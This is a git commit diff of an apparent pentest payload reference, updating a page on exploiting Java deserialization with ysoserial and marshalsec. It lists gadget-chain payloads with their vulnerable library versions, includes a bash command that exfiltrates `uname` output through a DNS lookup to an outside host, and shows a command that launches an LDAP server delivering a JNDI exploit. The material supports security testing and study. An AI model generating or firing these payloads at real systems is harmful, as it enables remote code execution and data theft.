YAML Deserialization

2026-01-18 23:55:29 -08:00 · 2022-09-16 16:37:40 +02:00
parent e677f07197
commit 267713c0fb
9 changed files with 162 additions and 69 deletions
--- a/Deserialization/Java.md
+++ b/Deserialization/Java.md
@@ -11,7 +11,7 @@

 ## Exploit

-[ysoserial](https://github.com/frohoff/ysoserial) : A proof-of-concept tool for generating payloads that exploit unsafe Java object deserialization.
+[frohoff/ysoserial](https://github.com/frohoff/ysoserial) : A proof-of-concept tool for generating payloads that exploit unsafe Java object deserialization.

 ```java
 java -jar ysoserial.jar CommonsCollections1 calc.exe > commonpayload.bin
@@ -20,37 +20,44 @@ java -jar ysoserial-master-v0.0.4-g35bce8f-67.jar Groovy1 'ping 127.0.0.1' > pay
 java -jar ysoserial.jar Jdk7u21 bash -c 'nslookup `uname`.[redacted]' | gzip | base64
 ```

-payload | author | dependencies | impact (if not RCE)
------|--------|------ |------
-BeanShell1          |@pwntester, @cschneider4711 |bsh:2.0b5
-C3P0                |@mbechler                   |c3p0:0.9.5.2, mchange-commons-java:0.2.11
-Clojure             |@JackOfMostTrades           |clojure:1.8.0
-CommonsBeanutils1   |@frohoff                    |commons-beanutils:1.9.2, commons-collections:3.1, commons-logging:1.2
-CommonsCollections1 |@frohoff                    |commons-collections:3.1
-CommonsCollections2 |@frohoff                    |commons-collections4:4.0
-CommonsCollections3 |@frohoff                    |commons-collections:3.1
-CommonsCollections4 |@frohoff                    |commons-collections4:4.0
-CommonsCollections5 |@matthias_kaiser, @jasinner |commons-collections:3.1
-CommonsCollections6 |@matthias_kaiser            |commons-collections:3.1
-FileUpload1         |@mbechler                   |commons-fileupload:1.3.1, commons-io:2.4 | file uploading
-Groovy1             |@frohoff                    |groovy:2.3.9
-Hibernate1          |@mbechler|
-Hibernate2          |@mbechler|
-JBossInterceptors1  |@matthias_kaiser            |javassist:3.12.1.GA, jboss-interceptor-core:2.0.0.Final, cdi-api:1.0-SP1, javax.interceptor-api:3.1, jboss-interceptor-spi:2.0.0.Final, slf4j-api:1.7.21
-JRMPClient          |@mbechler|
-JRMPListener        |@mbechler|
-JSON1               |@mbechler                   |json-lib:jar:jdk15:2.4, spring-aop:4.1.4.RELEASE, aopalliance:1.0, commons-logging:1.2, commons-lang:2.6, ezmorph:1.0.6, commons-beanutils:1.9.2, spring-core:4.1.4.RELEASE, commons-collections:3.1
-JavassistWeld1      |@matthias_kaiser            |javassist:3.12.1.GA, weld-core:1.1.33.Final, cdi-api:1.0-SP1, javax.interceptor-api:3.1, jboss-interceptor-spi:2.0.0.Final, slf4j-api:1.7.21
-Jdk7u21             |@frohoff|
-Jython1             |@pwntester, @cschneider4711 |jython-standalone:2.5.2
-MozillaRhino1       |@matthias_kaiser            |js:1.7R2
-Myfaces1            |@mbechler|
-Myfaces2            |@mbechler|
-ROME                |@mbechler                   |rome:1.0
-Spring1             |@frohoff                    |spring-core:4.1.4.RELEASE, spring-beans:4.1.4.RELEASE
-Spring2             |@mbechler                   |spring-core:4.1.4.RELEASE, spring-aop:4.1.4.RELEASE, aopalliance:1.0, commons-logging:1.2
-URLDNS              |@gebl| | jre only vuln detect
-Wicket1             |@jacob-baines               |wicket-util:6.23.0, slf4j-api:1.6.4
+```ps1
+Payload             Authors                                Dependencies                                                                                                                                                                                        
+-------             -------                                ------------                                                                                                                                                                                        
+AspectJWeaver       @Jang                                  aspectjweaver:1.9.2, commons-collections:3.2.2                                                                                                                                                      
+BeanShell1          @pwntester, @cschneider4711            bsh:2.0b5                                                                                                                                                                                           
+C3P0                @mbechler                              c3p0:0.9.5.2, mchange-commons-java:0.2.11                                                                                                                                                           
+Click1              @artsploit                             click-nodeps:2.3.0, javax.servlet-api:3.1.0                                                                                                                                                         
+Clojure             @JackOfMostTrades                      clojure:1.8.0                                                                                                                                                                                       
+CommonsBeanutils1   @frohoff                               commons-beanutils:1.9.2, commons-collections:3.1, commons-logging:1.2                                                                                                                               
+CommonsCollections1 @frohoff                               commons-collections:3.1                                                                                                                                                                             
+CommonsCollections2 @frohoff                               commons-collections4:4.0                                                                                                                                                                            
+CommonsCollections3 @frohoff                               commons-collections:3.1                                                                                                                                                                             
+CommonsCollections4 @frohoff                               commons-collections4:4.0                                                                                                                                                                            
+CommonsCollections5 @matthias_kaiser, @jasinner            commons-collections:3.1                                                                                                                                                                             
+CommonsCollections6 @matthias_kaiser                       commons-collections:3.1                                                                                                                                                                             
+CommonsCollections7 @scristalli, @hanyrax, @EdoardoVignati commons-collections:3.1                                                                                                                                                                             
+FileUpload1         @mbechler                              commons-fileupload:1.3.1, commons-io:2.4
+Groovy1             @frohoff                               groovy:2.3.9                                                                                                                                                                                        
+Hibernate1          @mbechler                                                                                                                                                                                                                                  
+Hibernate2          @mbechler                                                                                                                                                                                                                                  
+JBossInterceptors1  @matthias_kaiser                       javassist:3.12.1.GA, jboss-interceptor-core:2.0.0.Final, cdi-api:1.0-SP1, javax.interceptor-api:3.1, jboss-interceptor-spi:2.0.0.Final, slf4j-api:1.7.21                                            
+JRMPClient          @mbechler                                                                                                                                                                                                                                  
+JRMPListener        @mbechler                                                                                                                                                                                                                                  
+JSON1               @mbechler                              json-lib:jar:jdk15:2.4, spring-aop:4.1.4.RELEASE, aopalliance:1.0, commons-logging:1.2, commons-lang:2.6, ezmorph:1.0.6, commons-beanutils:1.9.2, spring-core:4.1.4.RELEASE, commons-collections:3.1
+JavassistWeld1      @matthias_kaiser                       javassist:3.12.1.GA, weld-core:1.1.33.Final, cdi-api:1.0-SP1, javax.interceptor-api:3.1, jboss-interceptor-spi:2.0.0.Final, slf4j-api:1.7.21                                                        
+Jdk7u21             @frohoff                                                                                                                                                                                                                                   
+Jython1             @pwntester, @cschneider4711            jython-standalone:2.5.2                                                                                                                                                                             
+MozillaRhino1       @matthias_kaiser                       js:1.7R2                                                                                                                                                                                            
+MozillaRhino2       @_tint0                                js:1.7R2                                                                                                                                                                                            
+Myfaces1            @mbechler                                                                                                                                                                                                                                  
+Myfaces2            @mbechler                                                                                                                                                                                                                                  
+ROME                @mbechler                              rome:1.0                                                                                                                                                                                            
+Spring1             @frohoff                               spring-core:4.1.4.RELEASE, spring-beans:4.1.4.RELEASE                                                                                                                                               
+Spring2             @mbechler                              spring-core:4.1.4.RELEASE, spring-aop:4.1.4.RELEASE, aopalliance:1.0, commons-logging:1.2                                                                                                           
+URLDNS              @gebl                                                                                                                                                                                                                                      
+Vaadin1             @kai_ullrich                           vaadin-server:7.7.14, vaadin-shared:7.7.14                                                                                                                                                          
+Wicket1             @jacob-baines                          wicket-util:6.23.0, slf4j-api:1.6.4   
+```

 ## Burp extensions using ysoserial

@@ -69,7 +76,8 @@ Wicket1             |@jacob-baines               |wicket-util:6.23.0, slf4j-api:
 - [marshalsec](https://github.com/mbechler/marshalsec) - Turning your data into code execution

 ```java
-java -cp target/marshalsec-0.0.1-SNAPSHOT-all.jar marshalsec.<Marshaller> [-a] [-v] [-t] [<gadget_type> [<arguments...>]]
+$ java -cp target/marshalsec-0.0.1-SNAPSHOT-all.jar marshalsec.<Marshaller> [-a] [-v] [-t] [<gadget_type> [<arguments...>]]
+$ java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.LDAPRefServer http://localhost:8000\#exploit.JNDIExploit 1389

 where
  -a - generates/tests all payloads for that marshaller
@@ -101,10 +109,12 @@ Payload generators for the following marshallers are included:<br />
 ## References

 - [Github - ysoserial](https://github.com/frohoff/ysoserial)
+- [Triggering a DNS lookup using Java Deserialization - paranoidsoftware.com](https://blog.paranoidsoftware.com/triggering-a-dns-lookup-using-java-deserialization/)
+- [Detecting deserialization bugs with DNS exfiltration - Philippe Arteau | Mar 22, 2017](https://www.gosecure.net/blog/2017/03/22/detecting-deserialization-bugs-with-dns-exfiltration/)
 - [Java-Deserialization-Cheat-Sheet - GrrrDog](https://github.com/GrrrDog/Java-Deserialization-Cheat-Sheet/blob/master/README.md)
 - [Understanding & practicing java deserialization exploits](https://diablohorn.com/2017/09/09/understanding-practicing-java-deserialization-exploits/)
 - [How i found a 1500$ worth Deserialization vulnerability - @D0rkerDevil](https://medium.com/@D0rkerDevil/how-i-found-a-1500-worth-deserialization-vulnerability-9ce753416e0a)
 - [Misconfigured JSF ViewStates can lead to severe RCE vulnerabilities - 14 Aug 2017, Peter Stöckli](https://www.alphabot.com/security/blog/2017/java/Misconfigured-JSF-ViewStates-can-lead-to-severe-RCE-vulnerabilities.html)
 - [Jackson CVE-2019-12384: anatomy of a vulnerability class](https://blog.doyensec.com/2019/07/22/jackson-gadgets.html)
 - [On Jackson CVEs: Don’t Panic — Here is what you need to know](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062#da96)
- [Pre-auth RCE in ForgeRock OpenAM (CVE-2021-35464) - Michael Stepankin / @artsploit - 29 June 2021](https://portswigger.net/research/pre-auth-rce-in-forgerock-openam-cve-2021-35464)
+- [Pre-auth RCE in ForgeRock OpenAM (CVE-2021-35464) - Michael Stepankin / @artsploit - 29 June 2021](https://portswigger.net/research/pre-auth-rce-in-forgerock-openam-cve-2021-35464)